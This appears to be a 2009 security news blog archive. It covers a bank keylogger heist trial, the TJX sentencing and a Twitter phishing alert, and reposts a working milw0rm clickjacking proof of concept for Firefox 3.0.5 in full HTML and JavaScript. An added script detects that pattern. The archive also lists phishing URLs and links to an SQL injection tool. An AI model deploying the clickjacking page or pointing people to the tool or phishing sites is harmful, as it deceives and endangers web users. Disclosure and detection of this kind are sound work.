Jan 24 2009

British Hackers Gang Tried To Steal £229m From Japanese Bank In High-Tech Scam

A six-strong hacker gang attempted to plunder £229million from a Japanese bank in an audacious high-tech scam, a court heard.

A crooked security guard at Japanese bank Sumitomo Mitsui let alleged computer hackers into the building in the dead of night where they installed spy software on computers used for multi-million pound cash transfers, the jury was told.

Days later the gang returned to harvest user names and passwords that staff had typed in, it was claimed.

In the early hours of the morning they used the data to try and transfer hundreds of millions of pounds from the bank’s customers to specially set up accounts across the world, the court was told.

The gang attempted to plunder the accounts of customers including Toshiba International, Nomura Asset Management, Mitsui OSK Lines and Sumitomo Chemicals and send millions of pounds to their accounts in Spain, Dubai, Hong Kong and Singapore, Snaresbrook Crown Court was told.

But the giant scam failed after the gang typed the wrong numbers into the cash transfer forms.
By this time police had already begun watching the alleged crooks.
The security guard Kevin O’Donoghue, 33, from Birmingham and the computer hackers Gille Poelvoorde, 34, from Belgium and Jan Van Osselaer, 32, also from Belgium have already pleaded guilty to conspiracy to steal from the bank.

Today their alleged co-conspirators Hugh Rodley, 61, from Gloucestershire, David Nash, 47, from West Sussex and Inger Malmros, 58, from Sweden appeared charged with setting up the bank accounts that the funds were going to be diverted to.

The jury heard that another two defendants died shortly before the trial.
Simon Farrell QC, prosecuting, said: ‘The case concerns a dishonest, bold and sophisticated attempt in October 2004 to steal £229,000 from the Sumitomo Mitsui Banking Corporation in the City of London.

‘The attempt was made by surreptitiously entering the bank at night, by corrupting its computer system and by attempting to electronically transfer the money.’

Mr Farrell claimed the gang were let in on several visits at night during September and the beginning of October 2004.
He said: ‘The plan involved the secret uploading of key logger software onto a number of the bank’s computers.
‘This software has the effect of logging the activities carried out by staff including log on names and passwords.
‘What the conspirators did was when they went into the bank they could retrieve the information stored on the computers.
‘Late in the evening of Friday October 1 2004 at about 11.30pm Van Osselaer and Poelvoorde with O’Donoghue entered the bank and were there until 4.30am during which time they accessed computers used for Swift [bank to bank cash transfer] instructions.
‘Having gained access to these computers Poelvoorde and Van Osselaer utilised information obtained from the software to compile ten swift messages instructing the transfer of money around the world.

‘Fortunately for the bank the transfers failed to go through because one of the field codes was incorrect.’
Mr Farrell claimed they returned the next day to attempt a further 11 transfers which failed for the same reason.

They tried to send 10million euros from Toshiba International’s account to one of their accounts in Dubai. They attempted to plunder 6.9million euros from the Nomura account, attempting to send it to Spain, it was claimed.

He alleged Nash, Malmros and Rodley, who is also known as Lord Rodley after buying a title, ‘were closely linked to the accounts that were to receive stolen funds.

‘All were involved in setting up and controlling a significant number.’
Mr Farrell said Rodley had coordinated receiving the cash adding he was ‘using others to front what he really is in charge of.’
He described O’Donoghue as the ‘inside man’ who tampered with CCTV records to try and erase video of the defendants at the bank.

When a colleague became suspicious about the comings and goings O’Donoghue apparently said that the alleged criminals were ‘friends and played poker at night.’

The trio deny conspiring to defraud the bank and conspiracy to transfer criminal property.

The case continues.

Source : DailyMail
http://tinyurl.com/ceynd5

Jan 22 2009

Firefox 3.0.5 Status Bar Obfuscation / Clickjacking

Firefox 3.0.5 Status Bar Obfuscation / Clickjacking
===========================================

<html>
<body>
<div id="mydiv"
onmouseover="document.location='http://www.milw0rm.com';"
style="position:absolute;width:2px;height:2px;background:#FFFFFF;border:0px"></div>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('mydiv').style.left=mouseX-1;
document.getElementById('mydiv').style.top=mouseY-1;
}
</script>
<center>
<br>
<font style="font-family:arial;font-size:32px">Status Bar Obfuscation
/ Clickjacking</font><br>
<font style="font-family:arial;font-size:24px">By MrDoug</font><br>
<br>
<hr size="3" width="500" color="#000000">
<br>
<font style="font-family:arial;font-size:20px">Click the VALID link to
google below to visit milw0rm.com</font><br>
<br>
<a href="http://www.google.com" onclick="updatebox(event)"><font
style="font-family:arial;font-size:32px">http://www.google.com</font></a><br>
<br>
<hr size="3" width="500" color="#000000">
<br>
<font style="font-family:arial;font-size:16px">Greetz to Slappywag</font><br>
</center>
<div style="position:absolute;bottom:0;">
<font style="font-family:arial;font-size:32px">Note this…<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;V
</font>
</div>
</body>
</html>

===========================================
MrDoug
mrdoug13[at]gmail[dot]com

# milw0rm.com [2009-01-21]
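
A detection heuristic for the markup pattern the PoC above depends on: a very small, absolutely positioned element whose hover handler assigns to `location`. This is an added example, not part of MrDoug's post; the function names, the 4px threshold and the sample markup are assumptions constructed for illustration.

```javascript
// Constructed sample: three elements; only the first has the PoC's shape.
const SAMPLE_HTML = `
<div id="overlay" onmouseover="document.location='https://other.example/';"
     style="position:absolute;width:2px;height:2px;border:0px"></div>
<div id="banner" onmouseover="location.href='/promo'"
     style="position:absolute;width:300px;height:80px"></div>
<img id="pixel" src="/t.gif" style="position:absolute;width:1px;height:1px">
`;

// Assignments to location, or location.assign()/replace(), inside a handler.
const NAV_SINK = /\blocation(?:\.href)?\s*=(?!=)|\blocation\.(?:assign|replace)\s*\(/i;
const HOVER_EVENTS = ['onmouseover', 'onmouseenter', 'onmousemove'];

// Parse name="value" pairs from the inside of a start tag (names lowercased).
function parseAttrs(tagBody) {
  const attrs = {};
  const re = /([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;
  let m;
  while ((m = re.exec(tagBody)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4];
  }
  return attrs;
}

// Read a pixel length such as "width:2px" from an inline style, or null.
function pxValue(style, prop) {
  const m = new RegExp('(?:^|;)\\s*' + prop + '\\s*:\\s*(\\d+(?:\\.\\d+)?)px', 'i').exec(style);
  return m ? parseFloat(m[1]) : null;
}

// Flag tiny absolute/fixed positioned elements whose hover handler navigates.
function findHoverRedirectOverlays(html, maxPx = 4) {
  const findings = [];
  const tagRe = /<([a-z][a-z0-9]*)\b((?:"[^"]*"|'[^']*'|[^'">])*)>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const attrs = parseAttrs(m[2]);
    const style = attrs.style || '';
    const event = HOVER_EVENTS.find((e) => attrs[e] && NAV_SINK.test(attrs[e]));
    const w = pxValue(style, 'width');
    const h = pxValue(style, 'height');
    const positioned = /position\s*:\s*(?:absolute|fixed)/i.test(style);
    if (event && positioned && w !== null && h !== null && w <= maxPx && h <= maxPx) {
      findings.push({ tag: m[1].toLowerCase(), id: attrs.id || null, event, width: w, height: h });
    }
  }
  return findings;
}
```

The check only sees inline handlers and inline styles; handlers attached from script or sizes set in a stylesheet need a rendered-DOM inspection instead.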

Jan 11 2009

TJX Maxx Hacker Jailed for 30 years

Yastremskiy – or ‘Maksik’ as he was sometimes identified – was one of 11 people eventually arrested at the request of the US Department of Justice, with the Ukrainian reportedly being apprehended in undignified fashion outside a Turkish nightclub in 2008.

Yastremskiy’s part in the crime was allegedly to have purchased credit card numbers stolen during the huge crime, providing the gang with an economic hub for its activities. Other members of the gang hailed from Estonia, Belarus, China, and several parts of the US itself, underlining the global nature of modern electronic crime.

Although not the perpetrator of the hack itself, Yastremskiy would have been essential to its success. He is reported to have been suspected of being behind other crimes not related to the TJX Maxx affair.

The TJX hack will go down as the first major disclosed commercial hack in history, after US-based hackers were able to ‘wardrive’ their way into a poorly-protected Wi-Fi system used for point-of-sale traffic. Forty-five million customer credit cards were said to have been exposed, leaving parent company, TJX Maxx, owning up to potential liabilities of at least $118 million.

Security vendors queued up to declare their satisfaction at the sentence. “Yastremskiy will certainly have plenty of time to ponder whether his hacking activities were worthwhile,” commented Graham Cluley of Sophos.

“The length of this jail time should also make others engaged in cybercrime think again,” he said. “It may seem like the chances of being caught are small, but there are more and more convictions happening all the time, and the authorities are getting better than ever at co-operating at an international level to catch the bad guys.”

Source : NetworkWorld
http://tinyurl.com/8dmfuo

Jan 06 2009

Phishing Attack Hits Twitter Users – Utilising Direct Messages

There has been a phishing scheme running around on Twitter this weekend.
But, so far, it’s a relatively easy one to avoid becoming a victim of.
Here are some tips on the phishing mess.

First, it is okay to check your DMs on Twitter.
You don’t need to be afraid to check them. But, be careful about any links in messages from others, even if you know them.
You won’t be affected by the scam just by reading your DMs.

For people using OpenDNS or Firefox 3, it appears that both of those are now blocking the phishing site. But, still be careful out there.

The short of it is that you should be careful, but don’t become irrational over the phishing attack.

Here are the known URLs of the phishing attack:

http://jannawalitax.blogspot.com/

http://twitterblog.access-logins.com/login

http://rosalierebyb.blogspot.com/

Source : dcr Blogs
http://www.dcrblogs.com/2009/01/04/twitter-phishing/

Jan 06 2009

WITOOL – Web SQL Injection Tool

WiTool

WITOOL is an SQL injection tool built on .NET (2.0).

- For SQL Server, Oracle
- Error-based and union-based

Features :
* Retrieve schema : DB/TableSpace, Table, Column, other object
* Retrieve data : retrieve paging, dump xml file
* Log : View the raw data HTTP log

Environment :
OS: Windows 2000/XP/VISTA
Requirement: Microsoft .NET(2.0) Library

Download :
http://witool.sourceforge.net/